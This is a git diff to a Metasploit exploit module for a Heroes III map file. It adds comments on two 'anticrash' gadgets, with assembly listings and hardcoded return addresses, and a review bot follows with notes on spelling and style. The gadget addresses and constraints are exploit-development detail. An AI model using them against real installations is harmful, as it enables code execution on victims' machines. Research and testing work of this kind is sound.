diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
index 4682a3d5bd..75b8facb0e 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -39,7 +39,32 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
 {
+ # Two "Anticrash"-gadgets are needed or the game will crash before ret
+ #
+ # Anticrash1, needs to pass the following code down to final JMP:
+ # MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
+ # XOR EBX, EBX
+ # CMP EAX, EBX
+ # JE SHORT ; JMP to crash if EAX is 0
+ # MOV CL, BYTE PTR DS : [EAX - 1]
+ # CMP CL, BL
+ # JE SHORT ; JMP to crash if the byte before [EAX] is 0
+ # CMP CL, 0FF
+ # JE SHORT ; JMP to crash if the byte before [EAX] is 0xFF
+ # CMP EDI, EBX
+ # JNE ; JMP to good spot. Always occurs if we get this far
+ #
+ # Summary: An address which when incremented by 4 and then dereferenced
+ # leads to for example a string which is preceeded neither by a 0x00 or 0xFF
 'Anticrash1' => 0x004497D4,
+ # Anticrash2, needs to return out of the following call (tricky):
+ #
+ # MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
+ # CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
+ #
+ # Summary: An address which when dereferenced leads to an address that
+ # when incremented by 4 and then deferenced leads to a function returning
+ # without accessing any registers/memory that would cause a crash.
 'Anticrash2' => 0x006A6430,
 'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
 }
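Review bot: The two new "Summary" comments carry spelling and grammar slips that should be fixed before merge: in the Anticrash1 summary `preceeded` should read `preceded`, and `neither by a 0x00 or 0xFF` should read `neither by 0x00 nor 0xFF`; in the Anticrash2 summary `deferenced` should read `dereferenced`. The assembly listing also mixes `0FF` and `0xFF` for the same immediate on adjacent lines, so writing both as `0xFF` would keep the listing consistent with the rest of the comment. These comments sit inside the target entry of class Metasploit3, whose definition starts and ends outside the hunk.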